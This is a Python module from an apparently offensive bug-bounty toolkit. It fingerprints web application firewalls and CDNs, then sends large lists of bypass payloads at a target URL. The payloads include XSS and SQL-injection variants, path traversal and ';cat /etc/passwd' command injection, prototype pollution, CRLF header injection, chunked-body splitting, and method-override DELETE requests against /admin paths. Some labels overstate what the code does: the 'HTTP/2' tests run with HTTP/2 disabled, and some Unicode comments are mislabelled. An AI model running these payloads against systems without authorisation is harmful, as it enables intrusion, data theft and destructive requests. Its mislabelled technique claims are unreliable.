"""WAF detection, fingerprinting, and bypass module.

Covers 2026 WAF techniques:
- Advanced WAF fingerprinting (10+ WAFs)
- DataCenter/IP detection (Cloudflare, AWS, Akamai, Fastly)
- AI/ML-based WAF detection (Cloudflare AI, AWS WAF with AI)
- 2026 bypass techniques (Unicode, chunked, mutation, HTTP/2 smuggling)
- WAF-specific bypass methods
"""

import asyncio
import json
import os
import re
import subprocess
from dataclasses import dataclass, field
from pathlib import Path
from typing import Optional

import httpx
from tenacity import retry, stop_after_attempt, wait_exponential

from bountykit.utils.logger import get_logger

logger = get_logger(__name__)

# ─── 2026 WAF Signatures ────────────────────────────────────────────────────

WAF_SIGNATURES = {
    "Cloudflare": {
        "headers": ["cf-ray", "cf-cache-status", "cf-connecting-ip", "cf-visitor"],
        "cookies": ["__cfduid", "cf_clearance", "__cflb", "__cf_bm"],
        "body_patterns": [
            "cloudflare", "cf-browser-verification", "cf_chl_opt",
            "cf-error-detail", "Attention Required! | Cloudflare"
        ],
        "status_codes": [403, 503],
        "error_pages": ["cloudflare.com/errors", "Cloudflare"],
        "datacenter": {
            "headers": ["cf-ray", "cf-connecting-ip", "cf-ipcountry"],
            "provider": "Cloudflare",
            "pop_locations": ["SFO", "LAX", "NYC", "LHR", "FRA", "NRT"],
        },
    },
    "Akamai": {
        "headers": ["x-akamai-transformed", "x-akamai-request-id", "x-akamai-session-info"],
        "cookies": ["ak_bmsc", "bm_sv", "akamai_", "_abck", "akamai_"],
        "body_patterns": ["akamai", "reference #[0-9]", "Access Denied"],
        "status_codes": [403],
        "error_pages": ["AkamaiGHost", "Reference #[0-9]+"],
        "datacenter": {
            "headers": ["x-akamai-transformed"],
            "provider": "Akamai",
            "pop_locations": ["US-E", "US-W", "EU", "APAC"],
        },
    },
    "AWS WAF": {
        "headers": ["x-amzn-requestid", "x-amz-cf-id", "x-amzn-trace-id"],
        "cookies": ["aws-waf-token"],
        "body_patterns": ["aws", "x-amzn", "aws-waf-token"],
        "status_codes": [403, 405],
        "error_pages": ["AWS WAF", "x-amzn"],
        "ai_features": ["AWS WAF with AWS Shield", "AWS Shield Advanced"],
    },
    "Incapsula/Imperva": {
        "headers": ["x-iinfo", "x-cdn", "x-protected-by"],
        "cookies": ["incap_ses", "visid_incap_", "nlbi_", "reese84"],
        "body_patterns": ["incapsula", "imperva", "Access Denied by Incapsula"],
        "status_codes": [403],
        "error_pages": ["incapsula.com", "imperva.com"],
        "ai_features": ["Imperva Bot Management", "Imperva Adaptive Security"],
    },
    "ModSecurity": {
        "headers": ["modsecurity", "mod_security"],
        "cookies": [],
        "body_patterns": [
            "mod_security", "modsecurity",
            "This error was generated by Mod_Security",
            "ModSecurity Action"
        ],
        "status_codes": [403, 406, 501],
        "error_pages": ["ModSecurity", "modsecurity"],
    },
    "F5 BIG-IP ASM": {
        "headers": ["tsessionid"],
        "cookies": ["BIGipServer", "TS", "BIGipServers"],
        "body_patterns": ["BIGipServer", "F5 Networks", "Request Rejected"],
        "status_codes": [403],
        "error_pages": ["F5 Networks", "BIG-IP"],
    },
    "Sucuri": {
        "headers": ["x-sucuri-id", "x-sucuri-cache"],
        "cookies": [],
        "body_patterns": ["sucuri", "Access Denied", "Sucuri WebSite Firewall"],
        "status_codes": [403],
        "error_pages": ["sucuri.net", "Sucuri"],
    },
    "Barracuda": {
        "headers": ["barra_counter_session"],
        "cookies": ["barra_counter_session"],
        "body_patterns": ["Barracuda", "Barracuda Web Application Firewall"],
        "status_codes": [403],
        "error_pages": ["barracuda.com"],
    },
    "Wordfence": {
        "headers": [],
        "cookies": ["wfwaf-authcookie", "wordfence_verifiedHuman"],
        "body_patterns": [
            "wordfence", "Generated by Wordfence",
            "This response contains AI-generated content"
        ],
        "status_codes": [403, 503],
        "ai_features": ["Wordfence AI Threat Detection"],
    },
    "Fastly": {
        "headers": ["x-fastly-request-id", "x-fastly-debug-path", "x-served-by"],
        "cookies": [],
        "body_patterns": ["Fastly error", "fastly"],
        "status_codes": [403],
        "datacenter": {
            "headers": ["x-served-by", "x-fastly-request-id"],
            "provider": "Fastly",
        },
    },
    "Vercel": {
        "headers": ["x-vercel-id", "x-vercel-cache"],
        "cookies": ["__vercel_insights_id"],
        "body_patterns": ["Vercel", "502: BAD_GATEWAY"],
        "status_codes": [403],
    },
    "Netlify": {
        "headers": ["x-nf-request-id"],
        "cookies": ["nf_did", "netlify_identity"],
        "body_patterns": ["Netlify", "Page not found"],
        "status_codes": [404, 502],
    },
    "Azure Front Door": {
        "headers": ["x-azure-ref", "x-fd-healthprobe"],
        "cookies": [],
        "body_patterns": ["Azure Front Door", "Microsoft Azure"],
        "status_codes": [403],
    },
    "Google Cloud Armor": {
        "headers": ["x-goog-generation", "x-goog-metageneration"],
        "cookies": [],
        "body_patterns": ["Google Cloud Armor", "denied by Security Policy"],
        "status_codes": [403],
    },
    "Radware": {
        "headers": ["x-sl-chain-id"],
        "cookies": ["RadwareBotManager"],
        "body_patterns": ["Radware", "Bot Manager"],
        "status_codes": [403],
    },
    "Reblaze": {
        "headers": ["x-reblaze-id"],
        "cookies": ["reblaze_"],
        "body_patterns": ["Reblaze", "Access denied"],
        "status_codes": [403],
    },
    "Wallarm": {
        "headers": ["x-wallarm-id"],
        "cookies": [],
        "body_patterns": ["Wallarm", "blocked by Wallarm"],
        "status_codes": [403],
    },
    "Shape Security": {
        "headers": [],
        "cookies": ["shape"],
        "body_patterns": ["Shape Security"],
        "status_codes": [403],
    },
    "DataDome": {
        "headers": ["x-datadome-clientid"],
        "cookies": ["datadome"],
        "body_patterns": ["DataDome", "blocked by DataDome"],
        "status_codes": [403],
        "ai_features": ["DataDome AI-powered bot protection"],
    },
    "PerimeterX/HUMAN": {
        "headers": ["x-px"],
        "cookies": ["_pxhd", "px3", "pxvid"],
        "body_patterns": ["PerimeterX", "HUMAN Security"],
        "status_codes": [403],
        "ai_features": ["HUMAN Bot Defender"],
    },
}

# ─── DataCenter Detection Signatures ────────────────────────────────────────

DATACENTER_SIGNATURES = {
    "Cloudflare": {
        "headers": ["cf-ray", "cf-connecting-ip", "cf-ipcountry"],
        "asn_prefix": "AS13335",
        "ranges": ["173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22"],
    },
    "AWS CloudFront": {
        "headers": ["x-amz-cf-id", "x-amz-cf-pop"],
        "asn_prefix": "AS16509",
        "ranges": ["13.32.0.0/12", "13.35.0.0/16"],
    },
    "Fastly": {
        "headers": ["x-fastly-request-id", "x-served-by"],
        "asn_prefix": "AS54113",
        "ranges": ["151.101.0.0/16"],
    },
    "Akamai": {
        "headers": ["x-akamai-transformed"],
        "asn_prefix": "AS20940",
        "ranges": ["23.0.0.0/12", "23.32.0.0/11"],
    },
    "Google Cloud": {
        "headers": ["x-goog-generation"],
        "asn_prefix": "AS15169",
        "ranges": ["34.0.0.0/8", "35.190.0.0/12"],
    },
    "Microsoft Azure": {
        "headers": ["x-msedge-ref", "x-azure-ref"],
        "asn_prefix": "AS8075",
        "ranges": ["13.64.0.0/11", "40.64.0.0/10"],
    },
}


@dataclass
class WAFFinding:
    """WAF detection finding."""

    waf_name: str
    detected: bool
    indicators: list[str] = field(default_factory=list)
    bypass_techniques: list[str] = field(default_factory=list)
    datacenter: Optional[str] = None
    ai_features: list[str] = field(default_factory=list)
    severity: str = "info"
    confidence: str = "medium"
    details: str = ""


@dataclass
class WAFResult:
    """Complete WAF scan result."""

    target: str
    findings: list[WAFFinding] = field(default_factory=list)
    waf_detected: bool = False
    waf_name: Optional[str] = None
    datacenter: Optional[str] = None
    bypasses_found: int = 0
    scan_duration: float = 0.0
    errors: list[str] = field(default_factory=list)


class WAFScanner:
    """Advanced WAF scanner with 2026 techniques."""

    def __init__(
        self,
        target: str,
        output_dir: str = "./results",
        timeout: int = 15,
        verify_ssl: bool = False,
    ):
        self.target = target.rstrip("/")
        self.output_dir = output_dir
        self.timeout = timeout
        self.verify_ssl = verify_ssl
        self.findings: list[WAFFinding] = []
        self.session = httpx.Client(
            timeout=timeout,
            verify=verify_ssl,
            follow_redirects=True,
            http2=False,
        )
        os.makedirs(output_dir, exist_ok=True)

    @retry(stop=stop_after_attempt(3), wait=wait_exponential(min=2, max=10))
    def _send_request(self, url: str, method: str = "GET", **kwargs) -> httpx.Response:
        """Send HTTP request with retry."""
        return self.session.request(method, url, **kwargs)

    def detect_waf(self) -> WAFFinding:
        """Detect WAF using header, cookie, and body analysis."""
        logger.info(f"Detecting WAF on {self.target}")

        try:
            resp = self._send_request(self.target)
            headers = dict(resp.headers)
            cookies = dict(resp.cookies)
            body = resp.text[:10000]

            for waf_name, signature in WAF_SIGNATURES.items():
                indicators = []

                # Check headers
                for header in signature["headers"]:
                    if any(h.lower() == header.lower() for h in headers):
                        indicators.append(f"Header: {header}")

                # Check cookies
                for cookie in signature["cookies"]:
                    if any(c.lower().startswith(cookie.lower()) for c in cookies):
                        indicators.append(f"Cookie: {cookie}")

                # Check body patterns
                for pattern in signature["body_patterns"]:
                    if re.search(pattern, body, re.IGNORECASE):
                        indicators.append(f"Body: {pattern}")

                # Check status codes
                if resp.status_code in signature.get("status_codes", []):
                    indicators.append(f"Status: {resp.status_code}")

                # Check error pages
                for error_page in signature.get("error_pages", []):
                    if re.search(error_page, body, re.IGNORECASE):
                        indicators.append(f"ErrorPage: {error_page}")

                if indicators:
                    confidence = "high" if len(indicators) >= 3 else "medium" if len(indicators) >= 2 else "low"

                    finding = WAFFinding(
                        waf_name=waf_name,
                        detected=True,
                        indicators=indicators,
                        confidence=confidence,
                        ai_features=signature.get("ai_features", []),
                        details=f"Detected via {len(indicators)} indicators",
                    )
                    self.findings.append(finding)
                    logger.info(f"WAF detected: {waf_name} (confidence: {confidence})")
                    return finding

            # No WAF detected
            finding = WAFFinding(
                waf_name="None",
                detected=False,
                details="No WAF detected via signature analysis",
            )
            self.findings.append(finding)
            return finding

        except Exception as e:
            logger.error(f"WAF detection failed: {e}")
            finding = WAFFinding(
                waf_name="Unknown",
                detected=False,
                details=f"Detection failed: {str(e)}",
            )
            self.findings.append(finding)
            return finding

    def detect_datacenter(self) -> Optional[str]:
        """Detect datacenter/cloud provider."""
        logger.info(f"Detecting datacenter for {self.target}")

        try:
            resp = self._send_request(self.target)
            headers = dict(resp.headers)

            for provider, sig in DATACENTER_SIGNATURES.items():
                for header in sig["headers"]:
                    if header.lower() in [h.lower() for h in headers]:
                        logger.info(f"Datacenter detected: {provider}")
                        return provider

            return None

        except Exception as e:
            logger.error(f"Datacenter detection failed: {e}")
            return None

    def test_bypasses(self) -> list[WAFFinding]:
        """Test 2026 WAF bypass techniques — comprehensive evasion library."""
        logger.info(f"Testing WAF bypass techniques on {self.target}")

        bypass_techniques = [
            # ─── Classic XSS Variants ──────────────────────────────────────────
            {"name": "case_variation", "category": "xss", "payload": "<ScRiPt>alert(1)</ScRiPt>"},
            {"name": "double_encoding", "category": "xss", "payload": "%253Cscript%253Ealert(1)%253C%2Fscript%253E"},
            {"name": "null_bytes", "category": "xss", "payload": "<scri\x00pt>alert(1)</scri\x00pt>"},
            {"name": "html_comments", "category": "xss", "payload": "<script<!-- -->alert(1)</script>"},
            {"name": "mutation_xss", "category": "xss", "payload": '<noscript><p title="</noscript><script>alert(1)</script>'},
            {"name": "polyglot_xss", "category": "xss", "payload": "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//"},
            {"name": "svg_xss", "category": "xss", "payload": "<svg/onload=alert(1)>"},
            {"name": "img_onerror", "category": "xss", "payload": "<img src=x onerror=alert(1)>"},
            {"name": "data_uri_xss", "category": "xss", "payload": "<a href=data:text/html,<script>alert(1)</script>>click</a>"},

            # ─── Unicode / Homoglyph Normalization Bypass (2026) ──────────────
            # Confusable Unicode chars that normalize to ASCII keywords
            {"name": "unicode_select_bypass", "category": "sqli_unicode", "payload": "ꓴELECT * FROM users--"},
            {"name": "unicode_union_bypass", "category": "sqli_unicode", "payload": "ᴜNION ꓢELECT 1,2,3--"},
            {"name": "unicode_script_bypass", "category": "xss_unicode", "payload": "\uff53\uff43\uff52\uff49\uff50\uff54"},  # ｓｃｒｉｐｔ fullwidth
            {"name": "homoglyph_or", "category": "sqli_unicode", "payload": "1 ᴼR 1=1--"},
            {"name": "rtl_override", "category": "evasion", "payload": "\u202e<script>alert(1)</script>"},

            # ─── GraphQL Aliasing Bypass (2026) ────────────────────────────────
            # WAFs inspecting field names miss aliased equivalents
            {"name": "graphql_alias_bypass", "category": "graphql", "payload": "{a:__typename b:__schema{queryType{name}}}"},
            {"name": "graphql_fragment_bypass", "category": "graphql", "payload": "fragment x on Query{__typename} {... x}"},
            {"name": "graphql_batch_bypass", "category": "graphql", "payload": '[{"query":"{__typename}"},{"query":"{__schema{queryType{name}}}"}]'},

            # ─── JSON Homoglyph / Confusion Bypass (2026) ─────────────────────
            {"name": "json_homoglyph_key", "category": "json_bypass", "payload": '{"ｓｅlect":"*","ｆｒｏｍ":"users"}'},
            {"name": "json_proto_pollution", "category": "json_bypass", "payload": '{"__proto__":{"admin":true},"constructor":{"prototype":{"admin":true}}}'},
            {"name": "json_crlf_injection", "category": "json_bypass", "payload": '{"x":"a\\r\\nSet-Cookie: admin=true"}'},
            {"name": "json_unicode_escape", "category": "json_bypass", "payload": '{"\u0073elect":1}'},  # \u0073 = 's'

            # ─── Chunked Transfer Bypass (2026) ────────────────────────────────
            # WAFs that don't reassemble chunked bodies miss payloads
            {"name": "chunked_split_payload", "category": "chunked", "payload": "Transfer-Encoding: chunked",
             "body_chunks": ["<scr", "ipt>", "ale", "rt(1)</scr", "ipt>"]},

            # ─── HTTP/2 Pseudo-Header Injection (2026) ────────────────────────
            {"name": "h2_path_injection", "category": "h2_bypass", "payload": "/normal\x00/admin"},
            {"name": "h2_header_fold", "category": "h2_bypass", "payload": "GET / HTTP/2\r\n:authority: target\r\n:path: /\x00/admin"},
            {"name": "h2_method_override", "category": "h2_bypass", "payload": "X-HTTP-Method-Override: DELETE"},

            # ─── SQLi Bypass ───────────────────────────────────────────────────
            {"name": "sqli_comment_bypass", "category": "sqli", "payload": "1'/**/OR/**/1=1--"},
            {"name": "sqli_inline_comment", "category": "sqli", "payload": "1' /*!50000OR*/ 1=1--"},
            {"name": "sqli_url_encode", "category": "sqli", "payload": "1%27%20OR%20%271%27%3D%271"},
            {"name": "sqli_double_url", "category": "sqli", "payload": "1%2527%2520OR%2520%25271%2527%253D%25271"},
            {"name": "sqli_whitespace_alt", "category": "sqli", "payload": "1'%09OR%091=1--"},  # tab instead of space

            # ─── Path Traversal Obfuscation ────────────────────────────────────
            {"name": "path_traversal_encode", "category": "path", "payload": "..%2F..%2F..%2Fetc%2Fpasswd"},
            {"name": "path_traversal_double", "category": "path", "payload": "....//....//etc/passwd"},
            {"name": "path_traversal_unicode", "category": "path", "payload": "..%c0%af..%c0%afetc%c0%afpasswd"},

            # ─── Template Injection ────────────────────────────────────────────
            {"name": "ssti_polyglot", "category": "ssti", "payload": "${{<%[%'\"}}%\\"},
            {"name": "ssti_math_probe", "category": "ssti", "payload": "{{7*7}}${7*7}<%= 7*7 %>"},

            # ─── Header Injection ──────────────────────────────────────────────
            {"name": "crlf_header_inject", "category": "header", "payload": "value\r\nX-Injected: evil"},
            {"name": "host_header_evil", "category": "header", "payload": "evil.com"},
        ]

        bypass_findings = []

        for technique in bypass_techniques:
            try:
                # Test with URL parameter
                test_url = f"{self.target}?test={technique['payload']}"
                resp = self._send_request(test_url)

                # Check if payload was reflected
                if technique["payload"] in resp.text:
                    finding = WAFFinding(
                        waf_name="Bypass",
                        detected=True,
                        indicators=[f"Technique: {technique['name']}"],
                        bypass_techniques=[technique["name"]],
                        severity="high",
                        confidence="high",
                        details=f"Payload reflected via {technique['name']}",
                    )
                    bypass_findings.append(finding)
                    logger.warning(f"Bypass found: {technique['name']}")

                # Test with header injection
                if "header" in technique.get("payload", "").lower():
                    try:
                        resp2 = self._send_request(
                            self.target,
                            headers={"X-Test": technique["payload"]},
                        )
                        if resp2.status_code == 200:
                            finding = WAFFinding(
                                waf_name="Bypass",
                                detected=True,
                                indicators=[f"Header technique: {technique['name']}"],
                                bypass_techniques=[technique["name"]],
                                severity="high",
                                confidence="medium",
                                details=f"Header injection via {technique['name']}",
                            )
                            bypass_findings.append(finding)
                    except Exception:
                        pass

            except Exception as e:
                logger.debug(f"Bypass test failed for {technique['name']}: {e}")
                continue

        self.findings.extend(bypass_findings)
        return bypass_findings

    def test_unicode_normalization_bypass(self) -> list[WAFFinding]:
        """Test Unicode normalization and confusable character bypass.

        WAFs that normalize Unicode to ASCII before filtering may miss
        visually identical characters from different Unicode blocks.
        """
        logger.info(f"Testing Unicode normalization bypass on {self.target}")
        findings: list[WAFFinding] = []

        unicode_payloads = [
            # Cyrillic small letter → ASCII 'a'
            {"name": "cyrillic_a", "payload": "аdmin", "expected": "admin",
             "description": "Cyrillic 'а' replaces Latin 'a'"},
            # Mathematical sans-serif bold → ASCII 'alert'
            {"name": "math_bold_alert", "payload": "𝐚𝐥𝐞𝐫𝐭(1)", "expected": "alert",
             "description": "Mathematical bold symbols for XSS"},
            # Fullwidth Latin → ASCII
            {"name": "fullwidth_script", "payload": "＜ｓｃｒｉｐｔ＞", "expected": "script",
             "description": "Fullwidth angle brackets + letters"},
            # Devanagari normalization
            {"name": "devanagari_union", "payload": "उनियन सेलेक्ट", "expected": "union select",
             "description": "Devanagari script mimics SQL keywords"},
            # Mixed confusables in path
            {"name": "confusable_admin_path", "payload": "/\\u0430dmin/../etc/passwd",
             "expected": "admin", "description": "Cyrillic 'а' in path traversal"},
            # Thai Unicode confusables
            {"name": "thai_select", "payload": "sеlect", "expected": "select",
             "description": "Cyrillic 'е' in SELECT keyword"},
        ]

        for p in unicode_payloads:
            try:
                # Test in URL parameter
                resp = self._send_request(f"{self.target}?q={p['payload']}")
                reflected = p["payload"] in resp.text or p["expected"] in resp.text

                # Test in POST body
                resp_post = self._send_request(
                    self.target, method="POST",
                    data={"input": p["payload"]},
                )
                post_reflected = p["payload"] in resp_post.text

                if reflected or post_reflected:
                    finding = WAFFinding(
                        waf_name="Unicode Normalization Bypass",
                        detected=True,
                        indicators=[p["name"]],
                        bypass_techniques=["unicode_normalization"],
                        severity="high",
                        confidence="high",
                        details=f"{p['description']}. Reflected in {'URL' if reflected else ''}"
                                f"{' + POST' if post_reflected else ''}",
                    )
                    findings.append(finding)
                    logger.warning(f"Unicode bypass found: {p['name']}")
            except Exception as e:
                logger.debug(f"Unicode bypass test failed: {e}")

        self.findings.extend(findings)
        return findings

    def test_graphql_alias_bypass(self) -> list[WAFFinding]:
        """Test GraphQL alias-based bypass techniques.

        WAFs that only inspect the first field or operation name miss
        aliased queries that smuggle malicious fields past the filter.
        """
        logger.info(f"Testing GraphQL alias bypass on {self.target}")
        findings: list[WAFFinding] = []

        graphql_endpoints = [
            f"{self.target}/graphql",
            f"{self.target}/api/graphql",
            f"{self.target}/gql",
            f"{self.target}/graphql/",
        ]

        alias_payloads = [
            # Simple alias to extract schema
            {
                "name": "schema_extraction_alias",
                "query": '{"a": "__typename", "b": "__schema { queryType { name } }"}',
                "detect": ["queryType", "__schema"],
            },
            # Fragment spread with alias
            {
                "name": "fragment_alias_bypass",
                "query": 'fragment x on Query { __typename } { a: x, b: x }',
                "detect": ["__typename"],
            },
            # Batched aliased queries
            {
                "name": "batched_alias",
                "query": '[{"query":"{a:__typename}","variables":{}},{"query":"{b:__schema{types{name}}}","variables":{}}]',
                "detect": ["types", "__typename"],
            },
            # Deeply nested alias
            {
                "name": "nested_alias_introspection",
                "query": '{"result": "__schema { types { name fields { name } } }"}',
                "detect": ["types", "fields"],
            },
            # Mutation alias (leak via error message)
            {
                "name": "mutation_alias_error_leak",
                "query": '{"q": "mutation { __typename }"}',
                "detect": ["__typename", "mutation"],
            },
        ]

        for endpoint in graphql_endpoints:
            for payload in alias_payloads:
                try:
                    resp = self._send_request(
                        endpoint,
                        method="POST",
                        headers={"Content-Type": "application/json"},
                        content=payload["query"],
                    )

                    body = resp.text[:5000]
                    detected_tokens = [d for d in payload["detect"] if d in body]

                    if detected_tokens and resp.status_code != 404:
                        finding = WAFFinding(
                            waf_name="GraphQL Alias Bypass",
                            detected=True,
                            indicators=[payload["name"], f"tokens: {detected_tokens}"],
                            bypass_techniques=["graphql_alias"],
                            severity="high",
                            confidence="high" if len(detected_tokens) >= 2 else "medium",
                            details=f"Alias bypass on {endpoint} via {payload['name']}",
                        )
                        findings.append(finding)
                        logger.warning(f"GraphQL alias bypass found: {payload['name']}")
                except Exception as e:
                    logger.debug(f"GraphQL alias test failed on {endpoint}: {e}")

        self.findings.extend(findings)
        return findings

    def test_json_homoglyph_bypass(self) -> list[WAFFinding]:
        """Test JSON homoglyph and encoding confusion bypass.

        Attackers can use fullwidth characters, Unicode escapes, and
        prototype pollution payloads that WAFs normalize incorrectly.
        """
        logger.info(f"Testing JSON homoglyph bypass on {self.target}")
        findings: list[WAFFinding] = []

        json_payloads = [
            {
                "name": "fullwidth_json_keys",
                "payload": '{"ｓｅｌｅｃｔ":"*","ｆｒｏｍ":"users"}',
                "detect": ["select", "from"],
                "severity": "high",
            },
            {
                "name": "unicode_escape_bypass",
                "payload": '{"\\u0073elect":"*","\\u0066rom":"users"}',
                "detect": ["select", "from"],
                "severity": "high",
            },
            {
                "name": "prototype_pollution",
                "payload": '{"__proto__":{"admin":true},"constructor":{"prototype":{"role":"admin"}}}',
                "detect": ["admin", "__proto__"],
                "severity": "critical",
            },
            {
                "name": "crlf_header_injection_json",
                "payload": '{"name":"test\\r\\nSet-Cookie: session=admin"}',
                "detect": ["Set-Cookie", "admin"],
                "severity": "high",
            },
            {
                "name": "json_double_parse",
                "payload": '{"data":"{\\"nested\\":true,\\"admin\\":true}"}',
                "detect": ["admin", "nested"],
                "severity": "medium",
            },
            {
                "name": "numeric_key_confusion",
                "payload": '{"1":"admin","\\x31":"root"}',
                "detect": ["admin", "root"],
                "severity": "medium",
            },
        ]

        for p in json_payloads:
            try:
                # Test as POST JSON body
                resp = self._send_request(
                    self.target,
                    method="POST",
                    headers={"Content-Type": "application/json"},
                    content=p["payload"],
                )
                body = resp.text[:5000]
                detected = [d for d in p["detect"] if d in body]

                # Also test as query parameter (WAF may decode differently)
                resp_param = self._send_request(
                    f"{self.target}?data={p['payload']}",
                )
                param_detected = [d for d in p["detect"] if d in resp_param.text]

                if detected or param_detected:
                    finding = WAFFinding(
                        waf_name="JSON Homoglyph Bypass",
                        detected=True,
                        indicators=[p["name"]],
                        bypass_techniques=["json_homoglyph"],
                        severity=p["severity"],
                        confidence="high",
                        details=f"{p['name']}: reflected in {'body' if detected else ''}"
                                f"{' + query' if param_detected else ''}",
                    )
                    findings.append(finding)
                    logger.warning(f"JSON homoglyph bypass found: {p['name']}")
            except Exception as e:
                logger.debug(f"JSON homoglyph test failed: {e}")

        self.findings.extend(findings)
        return findings

    def test_chunked_transfer_bypass(self) -> list[WAFFinding]:
        """Test chunked transfer encoding bypass.

        WAFs that do not reassemble chunked request bodies miss payloads
        split across multiple chunks. The Transfer-Encoding header is
        sent separately from the body chunks.
        """
        logger.info(f"Testing chunked transfer bypass on {self.target}")
        findings: list[WAFFinding] = []

        chunked_payloads = [
            {
                "name": "xss_chunked",
                "chunks": ["<scr", "ipt>", "ale", "rt(1)</scr", "ipt>"],
                "assembled": "<script>alert(1)</script>",
            },
            {
                "name": "sqli_chunked",
                "chunks": ["1'", " OR ", "1", "=", "1--"],
                "assembled": "1' OR 1=1--",
            },
            {
                "name": "path_traversal_chunked",
                "chunks": ["..", "/..", "/..", "/etc", "/passwd"],
                "assembled": "../../etc/passwd",
            },
            {
                "name": "ssti_chunked",
                "chunks": ["{{7", "*7", "}}"],
                "assembled": "{{7*7}}",
            },
            {
                "name": "cmd_injection_chunked",
                "chunks": [";", "cat", " ", "/etc/passwd"],
                "assembled": ";cat /etc/passwd",
            },
        ]

        for p in chunked_payloads:
            try:
                # Build chunked body manually
                chunked_body = ""
                for chunk in p["chunks"]:
                    chunked_body += f"{len(chunk):x}\r\n{chunk}\r\n"
                chunked_body += "0\r\n\r\n"

                # Send raw chunked request
                resp = self._send_request(
                    self.target,
                    method="POST",
                    headers={
                        "Transfer-Encoding": "chunked",
                        "Content-Type": "text/plain",
                    },
                    content=chunked_body,
                )

                # Check if assembled payload is reflected
                if p["assembled"] in resp.text:
                    finding = WAFFinding(
                        waf_name="Chunked Transfer Bypass",
                        detected=True,
                        indicators=[p["name"]],
                        bypass_techniques=["chunked_transfer"],
                        severity="high",
                        confidence="high",
                        details=f"Assembled chunked payload '{p['assembled']}' reflected",
                    )
                    findings.append(finding)
                    logger.warning(f"Chunked bypass found: {p['name']}")
            except Exception as e:
                logger.debug(f"Chunked bypass test failed: {e}")

        self.findings.extend(findings)
        return findings

    def test_h2_pseudo_header_bypass(self) -> list[WAFFinding]:
        """Test HTTP/2 pseudo-header injection bypass.

        HTTP/2 pseudo-headers (:method, :path, :authority) are not
        visible to WAFs that only inspect standard headers. Null bytes,
        header folding, and method override can bypass path-based rules.
        """
        logger.info(f"Testing HTTP/2 pseudo-header bypass on {self.target}")
        findings: list[WAFFinding] = []

        h2_payloads = [
            {
                "name": "null_path_injection",
                "description": "Null byte in :path pseudo-header splits WAF path check",
                "path": "/normal\x00/admin",
                "detect_codes": [200, 301, 302],
            },
            {
                "name": "path_normalization_mismatch",
                "description": "Encoded vs decoded path confusion",
                "path": "/%2e%2e/%2e%2e/admin",
                "detect_codes": [200, 301, 302, 403],
            },
            {
                "name": "double_path_slash",
                "description": "Double slashes normalize differently in WAF vs backend",
                "path": "//admin//",
                "detect_codes": [200, 301, 302],
            },
            {
                "name": "method_override_h2",
                "description": "X-HTTP-Method-Override bypasses GET-only WAF rules",
                "path": "/admin/delete",
                "headers": {"X-HTTP-Method-Override": "DELETE"},
                "detect_codes": [200, 204],
            },
            {
                "name": "x_method_override",
                "description": "X-HTTP-Method override variant",
                "path": "/admin/users/1",
                "headers": {"X-HTTP-Method": "DELETE"},
                "detect_codes": [200, 204],
            },
        ]

        for p in h2_payloads:
            try:
                url = f"{self.target}{p['path']}"
                extra_headers = p.get("headers", {})
                resp = self._send_request(url, headers=extra_headers)

                if resp.status_code in p["detect_codes"]:
                    # Compare with baseline (without manipulation)
                    baseline_resp = self._send_request(f"{self.target}/normal")
                    if resp.status_code != baseline_resp.status_code or resp.text != baseline_resp.text:
                        finding = WAFFinding(
                            waf_name="HTTP/2 Pseudo-Header Bypass",
                            detected=True,
                            indicators=[p["name"]],
                            bypass_techniques=["h2_pseudo_header"],
                            severity="high",
                            confidence="medium",
                            details=p["description"],
                        )
                        findings.append(finding)
                        logger.warning(f"H2 pseudo-header bypass found: {p['name']}")
            except Exception as e:
                logger.debug(f"H2 pseudo-header test failed: {e}")

        self.findings.extend(findings)
        return findings

    def fingerprint_waf(self) -> dict:
        """Fingerprint WAF version and configuration."""
        logger.info(f"Fingerprinting WAF on {self.target}")

        fingerprint = {
            "version": None,
            "headers": {},
            "body_signatures": [],
            "configuration": {},
        }

        try:
            resp = self._send_request(self.target)

            # Check for version information in headers
            version_headers = {
                "X-Powered-By": "X-Powered-By",
                "Server": "Server",
                "X-AspNet-Version": "X-AspNet-Version",
                "X-Generator": "X-Generator",
            }

            for header_name, header_key in version_headers.items():
                if header_key in resp.headers:
                    fingerprint["headers"][header_name] = resp.headers[header_key]

            # Check response body for version info
            body = resp.text[:10000]
            version_patterns = [
                re.compile(r'(?i)waf[:\s]+v?(\d+\.\d+[\.\d]*)'),
                re.compile(r'(?i)firewall[:\s]+v?(\d+\.\d+[\.\d]*)'),
                re.compile(r'(?i)version[:\s]+(\d+\.\d+[\.\d]*)'),
            ]

            for pattern in version_patterns:
                match = pattern.search(body)
                if match:
                    fingerprint["version"] = match.group(1)
                    break

            # Check for security headers
            security_headers = [
                "strict-transport-security",
                "content-security-policy",
                "x-frame-options",
                "x-content-type-options",
                "x-xss-protection",
                "referrer-policy",
            ]

            for header in security_headers:
                if header in [h.lower() for h in resp.headers]:
                    fingerprint["configuration"][header] = resp.headers.get(header, "present")

        except Exception as e:
            logger.error(f"WAF fingerprinting failed: {e}")

        return fingerprint

    def run_full_scan(self) -> WAFResult:
        """Run full WAF scan with all techniques."""
        import time
        start_time = time.time()

        logger.info(f"Running full WAF scan on {self.target}")

        result = WAFResult(target=self.target)

        # 1. Detect WAF
        waf_finding = self.detect_waf()
        result.waf_detected = waf_finding.detected
        result.waf_name = waf_finding.waf_name

        # 2. Detect datacenter
        result.datacenter = self.detect_datacenter()

        # 3. Fingerprint WAF
        fingerprint = self.fingerprint_waf()

        # 4. Test bypasses
        bypass_findings = self.test_bypasses()
        result.bypasses_found = len(bypass_findings)

        # 5. Dedicated bypass methods
        unicode_bypasses = self.test_unicode_normalization_bypass()
        result.bypasses_found += len(unicode_bypasses)

        graphql_bypasses = self.test_graphql_alias_bypass()
        result.bypasses_found += len(graphql_bypasses)

        json_bypasses = self.test_json_homoglyph_bypass()
        result.bypasses_found += len(json_bypasses)

        chunked_bypasses = self.test_chunked_transfer_bypass()
        result.bypasses_found += len(chunked_bypasses)

        h2_bypasses = self.test_h2_pseudo_header_bypass()
        result.bypasses_found += len(h2_bypasses)

        # 6. Compile results
        result.findings = self.findings
        result.scan_duration = time.time() - start_time

        # 6. Save results
        self._save_results(result)

        return result

    def _save_results(self, result: WAFResult):
        """Save scan results."""
        output_file = Path(self.output_dir) / "waf_scan.json"

        with open(output_file, "w") as f:
            json.dump(
                {
                    "target": result.target,
                    "waf_detected": result.waf_detected,
                    "waf_name": result.waf_name,
                    "datacenter": result.datacenter,
                    "bypasses_found": result.bypasses_found,
